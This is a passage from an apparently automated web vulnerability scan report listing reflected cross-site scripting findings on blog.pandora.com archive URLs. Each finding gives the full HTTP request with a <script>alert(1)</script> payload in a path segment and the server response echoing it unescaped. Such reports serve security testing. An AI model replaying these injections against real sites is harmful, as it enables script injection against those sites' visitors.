Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:44 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesbc94c<script>alert(1)</script>9dc1dabafdc/2009/03/ was not found on this server.</p>
...[SNIP]...

1.181. http://blog.pandora.com/pandora/archives/2009/03/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/03/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c2a57<script>alert(1)</script>b7dc6cce338 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009c2a57<script>alert(1)</script>b7dc6cce338/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:46 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009c2a57<script>alert(1)</script>b7dc6cce338/03/ was not found on this server.</p>
...[SNIP]...

1.182. http://blog.pandora.com/pandora/archives/2009/03/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/03/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 61662<script>alert(1)</script>e1daff6cf96 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009/0361662<script>alert(1)</script>e1daff6cf96/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:49 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009/0361662<script>alert(1)</script>e1daff6cf96/ was not found on this server.</p>
...[SNIP]...

1.183. http://blog.pandora.com/pandora/archives/2009/04/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/04/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7af11<script>alert(1)</script>1a13f4a03d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora7af11<script>alert(1)</script>1a13f4a03d2/archives/2009/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:32 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora7af11<script>alert(1)</script>1a13f4a03d2/archives/2009/04/ was not found on this server.</p>
...[SNIP]...

1.184. http://blog.pandora.com/pandora/archives/2009/04/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/04/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload beaf3<script>alert(1)</script>b750ded26f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesbeaf3<script>alert(1)</script>b750ded26f8/2009/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:34 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesbeaf3<script>alert(1)</script>b750ded26f8/2009/04/ was not found on this server.</p>
...[SNIP]...

1.185. http://blog.pandora.com/pandora/archives/2009/04/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/04/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 68bf4<script>alert(1)</script>2d188b48660 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200968bf4<script>alert(1)</script>2d188b48660/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:36 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200968bf4<script>alert(1)</script>2d188b48660/04/ was not found on this server.</p>
...[SNIP]...

1.186. http://blog.pandora.com/pandora/archives/2009/04/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/04/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7adfa<script>alert(1)</script>b1f6f7ee47a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009/047adfa<script>alert(1)</script>b1f6f7ee47a/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:39 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009/047adfa<script>alert(1)</script>b1f6f7ee47a/ was not found on this server.</p>
...[SNIP]...

1.187. http://blog.pandora.com/pandora/archives/2009/05/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/05/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ee40e<script>alert(1)</script>6dc1333d8df was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoraee40e<script>alert(1)</script>6dc1333d8df/archives/2009/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraee40e<script>alert(1)</script>6dc1333d8df/archives/2009/05/ was not found on this server.</p>
...[SNIP]...

1.188. http://blog.pandora.com/pandora/archives/2009/05/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/05/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 83b92<script>alert(1)</script>91c0dbd346e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives83b92<script>alert(1)</script>91c0dbd346e/2009/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:33 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives83b92<script>alert(1)</script>91c0dbd346e/2009/05/ was not found on this server.</p>
...[SNIP]...

1.189. http://blog.pandora.com/pandora/archives/2009/05/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/05/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7b54d<script>alert(1)</script>4def9d0af6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20097b54d<script>alert(1)</script>4def9d0af6/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:35 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 348
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20097b54d<script>alert(1)</script>4def9d0af6/05/ was not found on this server.</p>
...[SNIP]...

1.190. http://blog.pandora.com/pandora/archives/2009/05/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/05/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4fdb9<script>alert(1)</script>8f219a229f4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009/054fdb9<script>alert(1)</script>8f219a229f4/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:38 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009/054fdb9<script>alert(1)</script>8f219a229f4/ was not found on this server.</p>
...[SNIP]...

1.191. http://blog.pandora.com/pandora/archives/2009/06/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/06/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5ddb1<script>alert(1)</script>d964ffd68f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora5ddb1<script>alert(1)</script>d964ffd68f4/archives/2009/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora5ddb1<script>alert(1)</script>d964ffd68f4/archives/2009/06/ was not found on this server.</p>
...[SNIP]...

1.192. http://blog.pandora.com/pandora/archives/2009/06/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/06/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 40560<script>alert(1)</script>8295fb9672e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives40560<script>alert(1)</script>8295fb9672e/2009/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:32 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives40560<script>alert(1)</script>8295fb9672e/2009/06/ was not found on this server.</p>
...[SNIP]...

1.193. http://blog.pandora.com/pandora/archives/2009/06/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/06/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 35d6a<script>alert(1)</script>61d8424a6b1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200935d6a<script>alert(1)</script>61d8424a6b1/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:34 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200935d6a<script>alert(1)</script>61d8424a6b1/06/ was not found on this server.</p>
...[SNIP]...

1.194. http://blog.pandora.com/pandora/archives/2009/06/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/06/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6dc78<script>alert(1)</script>f9f9f8b2891 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009/066dc78<script>alert(1)</script>f9f9f8b2891/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:37 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009/066dc78<script>alert(1)</script>f9f9f8b2891/ was not found on this server.</p>
...[SNIP]...

1.195. http://blog.pandora.com/pandora/archives/2009/07/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/07/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ea0d3<script>alert(1)</script>7e8e5ab80a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoraea0d3<script>alert(1)</script>7e8e5ab80a9/archives/2009/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:32 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraea0d3<script>alert(1)</script>7e8e5ab80a9/archives/2009/07/ was not found on this server.</p>
...[SNIP]...

1.196. http://blog.pandora.com/pandora/archives/2009/07/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/07/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e6355<script>alert(1)</script>dcc343d2bd0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivese6355<script>alert(1)</script>dcc343d2bd0/2009/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:34 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivese6355<script>alert(1)</script>dcc343d2bd0/2009/07/ was not found on this server.</p>
...[SNIP]...

1.197. http://blog.pandora.com/pandora/archives/2009/07/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/07/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bdd32<script>alert(1)</script>e2655d97c30 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009bdd32<script>alert(1)</script>e2655d97c30/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
